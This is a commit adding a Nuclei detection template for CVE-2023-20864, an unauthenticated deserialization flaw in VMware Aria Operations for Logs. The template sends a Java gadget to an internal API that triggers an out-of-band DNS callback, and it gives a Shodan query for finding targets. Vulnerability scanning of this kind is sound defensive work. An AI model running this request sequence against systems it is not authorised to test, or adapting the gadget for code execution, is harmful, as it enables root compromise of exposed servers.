Merge pull request #7128 from projectdiscovery/CVE-2023-20864

VMware Aria Operations for Logs - Unauthenticated Remote Code Execution [CVE-2023-20864]
2023-04-28 16:20:29 +05:30 · 2023-04-28 16:20:29 +05:30 · 9d71180620
parent afe66651d7 392187b67e
commit 9d71180620
1 changed files with 51 additions and 0 deletions
--- a/http/cves/2023/CVE-2023-20864.yaml
+++ b/http/cves/2023/CVE-2023-20864.yaml
@ -0,0 +1,51 @@
+id: CVE-2023-20864
+
+info:
+  name: VMware Aria Operations for Logs - Unauthenticated Remote Code Execution
+  author: rootxharsh,iamnoooob,pdresearch
+  severity: critical
+  description: |
+    VMware Aria Operations for Logs contains a deserialization vulnerability. An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root.
+  reference:
+    - https://www.vmware.com/security/advisories/VMSA-2023-0007.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-20864
+  metadata:
+    verified: true
+    shodan-query: title:"vRealize Log Insight"
+  tags: cve,cve2023,vmware,aria,rce,oast
+
+requests:
+  - raw:
+      - |
+        GET /csrf HTTP/1.1
+        Host: {{Hostname}}
+        X-Csrf-Token: Fetch
+
+      - |
+        POST /api/v2/internal/cluster/applyMembership HTTP/1.1
+        Host: {{Hostname}}
+        X-CSRF-Token: {{xcsrftoken}}
+        Content-type: application/octet-stream
+
+        {{generate_java_gadget("dns", "http://{{interactsh-url}}", "raw")}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+
+      - type: word
+        part: body
+        words:
+          - '"errorMessage":"Internal error'
+
+    extractors:
+      - type: kval
+        internal: true
+        name: xcsrftoken
+        group: 1
+        kval:
+          - "X_CSRF_Token"